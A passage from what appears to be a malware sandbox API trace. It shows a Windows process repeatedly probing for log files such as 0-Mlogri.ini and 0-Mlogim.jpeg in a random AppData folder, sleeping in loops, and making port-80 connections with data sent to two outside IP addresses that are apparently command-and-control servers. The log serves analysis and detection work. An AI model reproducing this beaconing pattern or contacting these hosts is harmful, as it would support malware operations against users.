FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.970] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0226.970] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0226.970] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0226.970] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0226.970] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0226.970] Sleep (dwMilliseconds=0x7d0) [0226.983] Sleep (dwMilliseconds=0x7d0) [0226.999] Sleep (dwMilliseconds=0x7d0) [0227.019] Sleep (dwMilliseconds=0x7d0) [0227.030] Sleep (dwMilliseconds=0x7d0) [0227.046] Sleep (dwMilliseconds=0x7d0) [0227.062] Sleep (dwMilliseconds=0x7d0) [0227.080] Sleep (dwMilliseconds=0x7d0) [0227.092] Sleep (dwMilliseconds=0x7d0) [0227.108] Sleep (dwMilliseconds=0x7d0) [0227.124] Sleep (dwMilliseconds=0x7d0) [0227.139] Sleep (dwMilliseconds=0x7d0) [0227.163] Sleep (dwMilliseconds=0x7d0) [0227.170] Sleep (dwMilliseconds=0x7d0) [0227.186] Sleep (dwMilliseconds=0x7d0) [0227.202] Sleep (dwMilliseconds=0x7d0) [0227.221] Sleep (dwMilliseconds=0x7d0) [0227.233] Sleep (dwMilliseconds=0x7d0) [0227.249] Sleep (dwMilliseconds=0x7d0) [0227.266] Sleep (dwMilliseconds=0x7d0) [0227.283] Sleep (dwMilliseconds=0x7d0) [0227.295] Sleep (dwMilliseconds=0x7d0) [0227.311] socket (af=2, type=1, protocol=6) returned 0x2e4 [0227.311] connect (s=0x2e4, name=0x70ac870*(sa_family=2, sin_port=0x50, sin_addr="145.239.37.162"), namelen=16) returned 0 [0227.348] send (s=0x2e4, buf=0x25a505a*, len=177, flags=0) returned 177 [0227.348] setsockopt (s=0x2e4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0227.348] recv (in: s=0x2e4, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 452 [0227.393] closesocket (s=0x2e4) returned 0 [0227.394] Sleep (dwMilliseconds=0x7d0) [0227.405] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0227.405] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0227.405] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0227.405] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0227.405] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0227.405] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0227.405] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0227.405] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0227.405] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0227.405] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0227.405] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0227.405] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0227.405] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0227.405] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0227.405] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0227.405] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0227.405] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0227.405] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0227.406] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0227.406] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0227.406] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0227.406] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0227.406] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0227.406] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0227.406] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0227.406] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0227.406] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0227.406] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0227.406] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0227.406] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0227.406] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0227.406] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0227.406] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0227.406] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0227.406] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0227.406] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0227.406] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0227.406] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0227.406] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0227.407] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0227.407] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0227.407] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0227.407] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0227.407] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0227.407] Sleep (dwMilliseconds=0x7d0) [0227.426] Sleep (dwMilliseconds=0x7d0) [0227.436] Sleep (dwMilliseconds=0x7d0) [0227.451] Sleep (dwMilliseconds=0x7d0) [0227.467] Sleep (dwMilliseconds=0x7d0) [0227.515] Sleep (dwMilliseconds=0x7d0) [0227.530] Sleep (dwMilliseconds=0x7d0) [0227.545] Sleep (dwMilliseconds=0x7d0) [0227.561] Sleep (dwMilliseconds=0x7d0) [0227.582] Sleep (dwMilliseconds=0x7d0) [0227.592] Sleep (dwMilliseconds=0x7d0) [0227.607] Sleep (dwMilliseconds=0x7d0) [0227.623] Sleep (dwMilliseconds=0x7d0) [0227.638] Sleep (dwMilliseconds=0x7d0) [0227.654] Sleep (dwMilliseconds=0x7d0) [0227.670] Sleep (dwMilliseconds=0x7d0) [0227.689] Sleep (dwMilliseconds=0x7d0) [0227.702] Sleep (dwMilliseconds=0x7d0) [0227.717] Sleep (dwMilliseconds=0x7d0) [0227.748] Sleep (dwMilliseconds=0x7d0) [0227.763] Sleep (dwMilliseconds=0x7d0) [0227.793] socket (af=2, type=1, protocol=6) returned 0x2e4 [0227.794] connect (s=0x2e4, name=0x70ace70*(sa_family=2, sin_port=0x50, sin_addr="47.75.18.54"), namelen=16) returned 0 [0228.131] send (s=0x2e4, buf=0x25a505a*, len=165, flags=0) returned 165 [0228.131] setsockopt (s=0x2e4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0228.131] recv (in: s=0x2e4, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 1340 [0228.471] closesocket (s=0x2e4) returned 0 [0228.472] Sleep (dwMilliseconds=0x7d0) [0228.505] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.505] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.505] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0228.505] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.505] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.505] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.506] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.506] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.506] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.506] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.506] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.506] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.506] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.506] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.506] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.506] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.506] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.506] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.506] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.506] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.506] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.506] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.506] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0228.506] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0228.506] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.507] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, 